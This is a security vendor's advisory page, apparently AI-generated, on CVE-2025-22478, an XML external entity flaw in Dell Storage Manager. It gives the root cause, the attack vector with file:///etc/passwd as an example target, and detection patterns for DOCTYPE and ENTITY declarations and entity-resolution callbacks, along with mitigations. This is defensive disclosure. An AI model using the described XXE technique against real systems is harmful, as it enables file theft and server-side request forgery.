Skip to main content
A Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. Six years running.Find Out Why
CVE Vulnerability Database
Vulnerability Database/CVE-2025-22478

CVE-2025-22478: Dell Storage Manager XXE Vulnerability

CVE-2025-22478 is an XML External Entity vulnerability in Dell Storage Manager that allows unauthenticated attackers to disclose and tamper with information. This article covers technical details, affected versions, and mitigation.

Published:

CVE-2025-22478 Overview

CVE-2025-22478 affects Dell Storage Center - Dell Storage Manager version 20.1.20. The flaw is an Improper Restriction of XML External Entity Reference vulnerability [CWE-611]. An unauthenticated attacker with adjacent network access can exploit the issue to disclose sensitive information and tamper with data processed by the storage management interface.

Dell published the issue under advisory DSA-2025-191 on May 6, 2025.

Critical Impact

An adjacent-network attacker can exfiltrate sensitive files and tamper with XML-processed data through external entity injection against Dell Storage Manager without authentication.

Affected Products

  • Dell Storage Manager 20.1.20
  • Dell Storage Manager 2020 R1, R1.2, R1.10, R1.20
  • Dell Storage Manager 16.3.20 and 2016 R2.1

Discovery Timeline

  • 2025-05-06 - CVE-2025-22478 published to NVD
  • 2025-05-06 - Dell releases security advisory DSA-2025-191
  • 2025-05-13 - Last updated in NVD database

Technical Details for CVE-2025-22478

Vulnerability Analysis

The vulnerability resides in the XML parsing logic of Dell Storage Manager. The XML processor accepts documents that declare external entities and resolves them without applying entity restrictions. An attacker submits an XML payload referencing an external system identifier, and the parser fetches the referenced resource during document processing.

This behavior allows attackers to read local files from the storage management host. The parser can also issue outbound network requests on behalf of the application, enabling internal reconnaissance and tampering with XML-driven configuration flows. The CVSS vector indicates impact to confidentiality and integrity but not availability.

Root Cause

The root cause is improper restriction of XML external entity references [CWE-611]. The XML parser fails to disable DOCTYPE declarations, external general entities, and external parameter entities. Secure XML parsing requires explicitly disabling external entity resolution and DTD processing, which Dell Storage Manager 20.1.20 does not enforce.

Attack Vector

Exploitation requires adjacent network access to the Storage Manager interface. No authentication or user interaction is needed. An attacker sends a crafted XML document containing an external entity declaration that points to a local file path such as file:///etc/passwd or an internal HTTP endpoint. The server resolves the entity and embeds the contents into the parsed response or error output. Attackers can also chain the flaw to perform server-side request forgery against internal services reachable from the Storage Manager host.

No public proof-of-concept exploit is currently available, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog.

Detection Methods for CVE-2025-22478

Indicators of Compromise

  • Inbound XML requests to Dell Storage Manager containing <!DOCTYPE or <!ENTITY declarations
  • Outbound connections from the Storage Manager host to external attacker-controlled domains or unexpected internal IPs during XML processing
  • Storage Manager log entries showing XML parser errors referencing SYSTEM identifiers or unresolved entities
  • Unexpected file read access patterns from the Storage Manager service account

Detection Strategies

  • Inspect HTTP request bodies destined for Storage Manager endpoints for XML payloads containing external entity declarations or SYSTEM/PUBLIC identifiers.
  • Correlate Storage Manager process activity with outbound DNS and HTTP traffic to detect entity resolution callbacks.
  • Monitor file access events on the Storage Manager host for reads of sensitive files by the management service user.

Monitoring Recommendations

  • Forward Storage Manager application and access logs to a centralized analytics platform for retention and query.
  • Alert on adjacent-network sources issuing XML POST requests to management interfaces outside maintenance windows.
  • Baseline normal outbound traffic from storage management hosts and flag deviations such as connections to external resolvers.

How to Mitigate CVE-2025-22478

Immediate Actions Required

  • Apply the fixed Dell Storage Manager release as documented in advisory DSA-2025-191.
  • Restrict network access to the Storage Manager management interface to dedicated administrative VLANs and jump hosts.
  • Audit Storage Manager logs for prior XML requests containing external entity declarations.
  • Rotate any credentials, keys, or configuration secrets that could have been read from the management host.

Patch Information

Dell has released a fixed version through advisory Dell Security Update DSA-2025-191. Administrators should review the advisory for the corrected build numbers and upgrade Dell Storage Manager installations running 20.1.20 and earlier listed versions.

Workarounds

  • Place the Storage Manager management interface behind a firewall that restricts access to authorized administrator subnets only.
  • Disable or block external network egress from the Storage Manager host to prevent entity resolution callbacks.
  • Inspect inbound XML traffic with a web application firewall rule that rejects payloads containing <!DOCTYPE or <!ENTITY declarations until the patch is applied.

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne